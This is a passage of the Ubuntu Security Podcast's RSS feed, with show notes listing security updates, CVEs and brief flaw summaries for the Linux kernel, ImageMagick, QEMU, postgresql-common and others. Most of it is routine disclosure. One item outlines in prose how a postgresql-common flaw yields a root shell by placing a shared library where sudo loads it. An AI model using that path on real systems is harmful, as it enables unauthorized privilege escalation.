<li><a href="https://ubuntu.com/security/CVE-2019-19242">CVE-2019-19242</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16168">CVE-2019-16168</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-8740">CVE-2018-8740</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various robustness updates for SQLite related to CVEs from other
applications that misuse SQLite - so this makes SQLite more tolerant if
it is misused in the future - plus a fix of a possible crash (DoS) under
certain usage scenarios.</li>
</ul>
<h3 id="usn-4208-1-linux-kernel-vulnerabilities-03-42">[<a href="https://usn.ubuntu.com/4208-1/">USN-4208-1</a>] Linux kernel vulnerabilities [03:42]</h3>
<ul>
<li>12 CVEs addressed in Bionic (gcp-edge), Eoan (5.3 kernel)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-17075">CVE-2019-17075</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19083">CVE-2019-19083</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19075">CVE-2019-19075</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19069">CVE-2019-19069</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19067">CVE-2019-19067</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19065">CVE-2019-19065</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19061">CVE-2019-19061</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19060">CVE-2019-19060</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19048">CVE-2019-19048</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-18810">CVE-2019-18810</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17133">CVE-2019-17133</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15794">CVE-2019-15794</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Buffer overflow in wifi driver stack - able to be triggered by a remote
user in wifi range</li>
<li>Ubuntu specific OverlayFS and ShiftFS memory mapped reference counting
issue - can be triggered when combined with that when combined with AUFS
by a local attacker.</li>
<li>Memory leak based denial of service issues in various drivers (usually
during error conditions so unlikely to ever be hit in real use or able to
be easily triggered by malicious local users):
<ul>
<li>AMD Display Engine</li>
<li>Qualcomm FastRPC</li>
<li>Cascoda CA8210 SPI 802.15.4 wireless controller</li>
<li>AMD Audio CoProcessor</li>
<li>Intel OPA Gen1 Infiniband</li>
<li>ADIS16400 IIO IMU</li>
<li>VirtualBox guest</li>
<li>ARM Komeda display</li>
</ul>
</li>
</ul>
<h3 id="usn-4209-1-linux-kernel-vulnerabilities-06-07">[<a href="https://usn.ubuntu.com/4209-1/">USN-4209-1</a>] Linux kernel vulnerabilities [06:07]</h3>
<ul>
<li>3 CVEs addressed in Bionic (HWE), Disco (5.0 kernel)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-19076">CVE-2019-19076</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16746">CVE-2019-16746</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15794">CVE-2019-15794</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Memory leak in Netronome NFP4000/NFP6k000 driver</li>
<li>Buffer overflow via 802.11 wifi config interface - local user onlu</li>
<li>OverlayFS/ShiftFS issue above</li>
</ul>
<h3 id="usn-4210-1-linux-kernel-vulnerabilities-06-47">[<a href="https://usn.ubuntu.com/4210-1/">USN-4210-1</a>] Linux kernel vulnerabilities [06:47]</h3>
<ul>
<li>6 CVEs addressed in Xenial (HWE), Bionic (4.15)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-17075">CVE-2019-17075</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19075">CVE-2019-19075</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19065">CVE-2019-19065</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19060">CVE-2019-19060</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17133">CVE-2019-17133</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16746">CVE-2019-16746</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>See above:
<ul>
<li>Wifi stack buffer overflow from remote user</li>
<li>Wifi config buffer overflow from local user</li>
<li>Memory leaks above:
<ul>
<li>Cascoda CA8210 SPI 802.15.4 wireless controller</li>
<li>Intel OPA Gen1 Infiniband</li>
<li>ADIS16400 IIO IMU</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="usn-4211-1-usn-4211-2-linux-kernel-vulnerabilities-07-22">[<a href="https://usn.ubuntu.com/4211-1/">USN-4211-1</a>, <a href="https://usn.ubuntu.com/4211-2/">USN-4211-2</a>] Linux kernel vulnerabilities [07:22]</h3>
<ul>
<li>3 CVEs addressed in Xenial, Trusty ESM (Xenial HWE)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-17075">CVE-2019-17075</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17133">CVE-2019-17133</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20784">CVE-2018-20784</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Wifi stack remote user buffer overflow</li>
<li>Infinite loop in the CFS scheduler able to be triggered by a local user
-&gt; DoS</li>
</ul>
<h3 id="usn-4206-1-graphicsmagick-vulnerabilities-07-55">[<a href="https://usn.ubuntu.com/4206-1/">USN-4206-1</a>] GraphicsMagick vulnerabilities [07:55]</h3>
<ul>
<li>10 CVEs addressed in Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-6335">CVE-2017-6335</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-14042">CVE-2017-14042</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-13147">CVE-2017-13147</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-11637">CVE-2017-11637</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-11636">CVE-2017-11636</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-11403">CVE-2017-11403</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-11140">CVE-2017-11140</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-11102">CVE-2017-11102</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-10799">CVE-2017-10799</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-10794">CVE-2017-10794</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Usual sorts of memory mismanagement issues seen in large C codebases
(most resulting in crash -&gt; DoS)
<ul>
<li>OOB read</li>
<li>Various memory allocation failure issues - trigger crash -&gt; DoS</li>
<li>NULL pointer dereference</li>
<li>Heap buffer overflow for RGB images with multiple frames with
non-identical widths</li>
<li>UAF via a crafted MNG image</li>
<li>Resource consumption via crafted JPEG which specifies invalid scanlines</li>
<li>Memory leaks -&gt; memory exhaustion -&gt; crash -&gt; DoS</li>
</ul>
</li>
</ul>
<h3 id="usn-4207-1-graphicsmagick-vulnerabilities-09-18">[<a href="https://usn.ubuntu.com/4207-1/">USN-4207-1</a>] GraphicsMagick vulnerabilities [09:18]</h3>
<ul>
<li>13 CVEs addressed in Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11506">CVE-2019-11506</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11505">CVE-2019-11505</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11474">CVE-2019-11474</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11473">CVE-2019-11473</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11010">CVE-2019-11010</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11009">CVE-2019-11009</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11008">CVE-2019-11008</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11007">CVE-2019-11007</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11006">CVE-2019-11006</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11005">CVE-2019-11005</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20189">CVE-2018-20189</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20185">CVE-2018-20185</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20184">CVE-2018-20184</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4194-2-postgresql-common-vulnerability-09-29">[<a href="https://usn.ubuntu.com/4194-2/">USN-4194-2</a>] postgresql-common vulnerability [09:29]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-3466">CVE-2019-3466</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-54/">Episode 54</a> - Debian specific package - privesc</li>
</ul>
<h3 id="usn-4182-3-usn-4182-4-intel-microcode-regression-09-44">[<a href="https://usn.ubuntu.com/4182-3/">USN-4182-3</a>, <a href="https://usn.ubuntu.com/4182-4/">USN-4182-4</a>] Intel Microcode regression [09:44]</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM, Xenial, Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11139">CVE-2019-11139</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11135">CVE-2019-11135</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Previous microcode update resulted in some Skylake processors hanging on
a warm reboot - not Ubuntu specific and is tracked upstream by Intel
<a href="https://github.com/intel/Intel-Linux-Processor-Microcode-Data-Files/issues/21">https://github.com/intel/Intel-Linux-Processor-Microcode-Data-Files/issues/21</a> -
so this update reverts the microcode only for those specific processor
models</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="joe-and-alex-discuss-a-recent-fbi-advisory-concerning-smarttvs-10-50">Joe and Alex discuss a recent FBI Advisory concerning SmartTVs [10:50]</h3>
<ul>
<li><a href="https://threatpost.com/smart-tvs-cyberthreat-living-room-feds/150713/">https://threatpost.com/smart-tvs-cyberthreat-living-room-feds/150713/</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E055.mp3" length="32757219" type="audio/mpeg" /><itunes:duration>25:29</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 54
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-54/</link>
          <pubDate>Sun, 24 Nov 2019 10:16:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>e0abd272be0b26357bb4c2a077b96b83dc1a5fd44d91d5d817b0328423aa96543ed9eeae8f12644903e9825e9b31712f5291b1333114a285c89df4393df9b10b</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 54</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          Security updates for DPDK, Linux kernel, QEMU, ImageMagick, Ghostscript and
  more, plus Joe and Alex talk about how to get into information security.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  Security updates for DPDK, Linux kernel, QEMU, ImageMagick, Ghostscript and
  more, plus Joe and Alex talk about how to get into information security.
  </itunes:summary>
        <description>  Security updates for DPDK, Linux kernel, QEMU, ImageMagick, Ghostscript and
  more, plus Joe and Alex talk about how to get into information security.
  </description>
        <googleplay:description>  Security updates for DPDK, Linux kernel, QEMU, ImageMagick, Ghostscript and
  more, plus Joe and Alex talk about how to get into information security.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>Security updates for DPDK, Linux kernel, QEMU, ImageMagick, Ghostscript and
more, plus Joe and Alex talk about how to get into information security.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>89 unique CVEs addressed</p>
<h3 id="usn-4189-1-dpdk-vulnerability-01-00">[<a href="https://usn.ubuntu.com/4189-1/">USN-4189-1</a>] DPDK vulnerability [01:00]</h3>
<ul>
<li>1 CVEs addressed in Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-14818">CVE-2019-14818</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Data Plane Development Kit - Memory and file-descriptor leak, able to be
triggered by a malicious master or a container with access to the
vhost_user socket</li>
</ul>
<h3 id="usn-4190-1-libjpeg-turbo-vulnerabilities-01-41">[<a href="https://usn.ubuntu.com/4190-1/">USN-4190-1</a>] libjpeg-turbo vulnerabilities [01:41]</h3>
<ul>
<li>4 CVEs addressed in Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-2201">CVE-2019-2201</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20330">CVE-2018-20330</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19664">CVE-2018-19664</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14498">CVE-2018-14498</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 x heap-buffer overflow - crash or possible RCE</li>
<li>2 x heap-buffer overread - crash</li>
</ul>
<h3 id="usn-4183-2-linux-kernel-vulnerability-02-48">[<a href="https://usn.ubuntu.com/4183-2/">USN-4183-2</a>] Linux kernel vulnerability [02:48]</h3>
<ul>
<li>9 CVEs addressed in Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-17666">CVE-2019-17666</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16746">CVE-2019-16746</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15793">CVE-2019-15793</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15792">CVE-2019-15792</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15791">CVE-2019-15791</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-0154">CVE-2019-0154</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12207">CVE-2018-12207</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11135">CVE-2019-11135</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-0155">CVE-2019-0155</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-53/">Episode 53</a> - Extra update for <a href="https://ubuntu.com/security/CVE-2019-0155">CVE-2019-0155 (i915 blitter command streamer)</a> - previous
one was based on an in-flight patch that got changed at the last minute
before the CRD - part of this fix is to whitelist certain commands to the
command-streamer, and this is done via a bitmask - this used a memset()
to zero it out but assumed the size of the underlying data was 32-bit -
so on 64-bit platforms this becomes a 64-bit size and so half the bitmask
is not zeroed out - meaning the whitelist may be able to be bypassed -
this fix includes the final upstream fix</li>
</ul>
<h3 id="usn-4184-2-linux-kernel-vulnerability-and-regression-04-37">[<a href="https://usn.ubuntu.com/4184-2/">USN-4184-2</a>] Linux kernel vulnerability and regression [04:37]</h3>
<ul>
<li>14 CVEs addressed in Bionic (HWE), Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-17666">CVE-2019-17666</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17056">CVE-2019-17056</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17055">CVE-2019-17055</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17054">CVE-2019-17054</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17053">CVE-2019-17053</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17052">CVE-2019-17052</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15793">CVE-2019-15793</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15792">CVE-2019-15792</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15791">CVE-2019-15791</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15098">CVE-2019-15098</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-0154">CVE-2019-0154</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12207">CVE-2018-12207</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11135">CVE-2019-11135</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-0155">CVE-2019-0155</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>See above (i915 vuln) - but also includes a fix for a regression that was
introduced in last week&rsquo;s kernel - KVM guests would fail to launch if
extended page tables were disabled or not supported.</li>
</ul>
<h3 id="usn-4185-3-linux-kernel-vulnerability-and-regression-05-05">[<a href="https://usn.ubuntu.com/4185-3/">USN-4185-3</a>] Linux kernel vulnerability and regression [05:05]</h3>
<ul>
<li>11 CVEs addressed in Xenial (HWE), Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-17666">CVE-2019-17666</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17056">CVE-2019-17056</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17055">CVE-2019-17055</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17054">CVE-2019-17054</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17053">CVE-2019-17053</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17052">CVE-2019-17052</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15098">CVE-2019-15098</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-0154">CVE-2019-0154</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12207">CVE-2018-12207</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11135">CVE-2019-11135</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-0155">CVE-2019-0155</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>See above (both i915 vuln and KVM regression)</li>
</ul>
<h3 id="usn-4186-3-linux-kernel-vulnerability-05-22">[<a href="https://usn.ubuntu.com/4186-3/">USN-4186-3</a>] Linux kernel vulnerability [05:22]</h3>
<ul>
<li>13 CVEs addressed in Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-2215">CVE-2019-2215</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17666">CVE-2019-17666</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17056">CVE-2019-17056</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17055">CVE-2019-17055</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17054">CVE-2019-17054</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17053">CVE-2019-17053</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17052">CVE-2019-17052</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16746">CVE-2019-16746</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15098">CVE-2019-15098</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-0154">CVE-2019-0154</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12207">CVE-2018-12207</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11135">CVE-2019-11135</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-0155">CVE-2019-0155</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>i915 vuln</li>
</ul>
<h3 id="usn-4191-1-usn-4191-2-qemu-vulnerabilities-05-32">[<a href="https://usn.ubuntu.com/4191-1/">USN-4191-1</a>, USN-4191-2] QEMU vulnerabilities [05:32]</h3>
<ul>
<li>5 CVEs addressed in Trusty ESM, Xenial, Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-15890">CVE-2019-15890</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14378">CVE-2019-14378</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13164">CVE-2019-13164</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12155">CVE-2019-12155</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12068">CVE-2019-12068</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Heap buffer overflow and UAF in SLiRP networking implementation - DoS +
possible code exec</li>
<li>Bridge helper didn&rsquo;t validate interface names to be within IFNAMSIZ -
could be used to bypass ACL restrictions</li>
<li>NULL pointer dereference in qxl paravirtual graphics driver - DoS</li>
<li>Possible CPU based DoS via an infinite loop able to be triggered in the
LSI SCSI adaptor emulator</li>
</ul>
<h3 id="usn-4192-1-imagemagick-vulnerabilities-06-48">[<a href="https://usn.ubuntu.com/4192-1/">USN-4192-1</a>] ImageMagick vulnerabilities [06:48]</h3>
<ul>
<li>30 CVEs addressed in Xenial, Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-16713">CVE-2019-16713</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16711">CVE-2019-16711</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16710">CVE-2019-16710</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16709">CVE-2019-16709</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16708">CVE-2019-16708</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15140">CVE-2019-15140</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15139">CVE-2019-15139</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14981">CVE-2019-14981</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13454">CVE-2019-13454</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13391">CVE-2019-13391</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13311">CVE-2019-13311</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13310">CVE-2019-13310</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13309">CVE-2019-13309</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13308">CVE-2019-13308</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13307">CVE-2019-13307</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13306">CVE-2019-13306</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13305">CVE-2019-13305</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13304">CVE-2019-13304</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13301">CVE-2019-13301</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13300">CVE-2019-13300</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13297">CVE-2019-13297</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13295">CVE-2019-13295</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13137">CVE-2019-13137</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13135">CVE-2019-13135</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12979">CVE-2019-12979</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12978">CVE-2019-12978</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12977">CVE-2019-12977</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12976">CVE-2019-12976</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12975">CVE-2019-12975</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12974">CVE-2019-12974</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Usual raft of issues - DoS, RCE etc - in various image decoders etc - so
just need to display or process a malicious image via ImageMagick to
trigger - interestingly, seems to be noticed - some applications (<a href="https://lists.gnu.org/archive/html/emacs-devel/2018-12/msg00036.html">Emacs</a>)
<a href="https://emba.gnu.org/emacs/emacs/commit/d2dea70415ca7ec390a2de11b224ab4cbb2c6b55">chose <strong>not</strong> to automatically link against and use ImageMagick now</a> as a
result of all the various vulnerablilties which keep being found in it&hellip;</li>
</ul>
<h3 id="usn-4193-1-ghostscript-vulnerability-08-13">[<a href="https://usn.ubuntu.com/4193-1/">USN-4193-1</a>] Ghostscript vulnerability [08:13]</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-14869">CVE-2019-14869</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Another -dSAFER bypass - newest Ghostscript is not affected since it
rewrote the SAFER sandbox - but older versions are - allows a malicious
postscript file to bypass the sandbox and access files or execute
commands etc.</li>
</ul>
<h3 id="usn-4194-1-postgresql-common-vulnerability-09-17">[<a href="https://usn.ubuntu.com/4194-1/">USN-4194-1</a>] postgresql-common vulnerability [09:17]</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-3466">CVE-2019-3466</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Privesc via arbitrary directory creation through the pg_ctlcluster
command - allows to create a dir as postgres user - say
/usr/lib/sudo/haswell - then dump a shared lib there which will be loaded
by sudo to gain a root shell - by specifying this as the
stats_temp_directory in the config</li>
<li>Interesting but requires ability to configure and run as postgres</li>
</ul>
<h3 id="usn-4195-1-mysql-vulnerabilities-11-07">[<a href="https://usn.ubuntu.com/4195-1/">USN-4195-1</a>] MySQL vulnerabilities [11:07]</h3>
<ul>
<li>29 CVEs addressed in Xenial, Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-3018">CVE-2019-3018</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3011">CVE-2019-3011</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3009">CVE-2019-3009</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3004">CVE-2019-3004</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3003">CVE-2019-3003</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2998">CVE-2019-2998</a> <!-- raw HTML omitted --></li>
